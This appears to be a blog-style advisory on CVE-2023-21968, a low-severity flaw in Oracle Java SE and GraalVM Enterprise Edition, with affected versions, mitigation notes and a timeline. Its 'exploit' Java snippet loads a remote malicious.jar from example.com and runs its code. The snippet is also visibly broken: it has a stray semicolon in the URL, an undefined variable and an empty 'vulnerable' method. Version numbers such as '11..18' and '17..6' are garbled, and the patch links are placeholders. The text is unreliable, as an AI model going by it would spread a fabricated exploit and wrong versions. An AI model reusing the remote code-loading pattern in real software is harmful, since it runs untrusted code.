CVE-2023-21968 is a security vulnerability in Oracle Java SE and Oracle GraalVM Enterprise Edition that allows an unauthenticated attacker with network access via multiple protocols to compromise these platforms. Affected versions include Oracle Java SE: 8u361, 8u361-perf, 11..18, 17..6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5, and 22.3.1. This vulnerability is difficult to exploit but has the potential to result in unauthorized update, insert, or delete access to some accessible data. The CVSS 3.1 Base Score is 3.7, with the vector described as (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).

Exploit Details

The vulnerability specifically applies to Java deployments that run sandboxed Java Web Start applications or sandboxed Java applets and load untrusted code, such as code originating from the internet. It relies on the Java sandbox for security and can be exploited through APIs in the Libraries component, such as through a web service that supplies data to the APIs.

The following code snippet illustrates a potential exploit scenario

## Java Web Start application example
public class WebStartExploit {
    public static void main(String[] args) {
        // Load untrusted code from a remote URL
        try {
            URLClassLoader loader = new URLClassLoader(new URL[]{new URL("https://example.com/malicious.jar";)});
            Class<?> exploitClass = loader.loadClass("malicious.Exploit");
            // Invoke vulnerable operation
            vulnerableMethod(exploit.getClass().getMethod("run").invoke(null));
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static void vulnerableMethod(Object obj) {
        // Perform update, insert, or delete action
    }
}

Mitigation

Oracle has released patches toaddress this vulnerability in the affected versions of Oracle Java SE and GraalVM Enterprise Edition. Users should apply the appropriate patch or update to protect against this vulnerability:

- Oracle Java SE 8u361, 8u361-perf: Patch Link
- Oracle Java SE 11..18: Patch Link
- Oracle Java SE 17..6: Patch Link
- Oracle Java SE 20: Patch Link
- Oracle GraalVM Enterprise Edition 20.3.9: Patch Link
- Oracle GraalVM Enterprise Edition 21.3.5: Patch Link
- Oracle GraalVM Enterprise Edition 22.3.1: Patch Link

Original References

- Oracle Security Alert Advisory - CVE-2023-21968
- NVD - CVE-2023-21968

Conclusion

CVE-2023-21968 is a notable vulnerability in Oracle Java SE and GraalVM Enterprise Edition that could potentially allow unauthorized access to update, insert, or delete some accessible data. Although it is difficult to exploit, it's important to keep your Java deployments up-to-date and apply the necessary patches to protect against potential security threats.

Timeline

Published on: 04/18/2023 20:15:00 UTC
Last modified on: 05/17/2023 17:06:00 UTC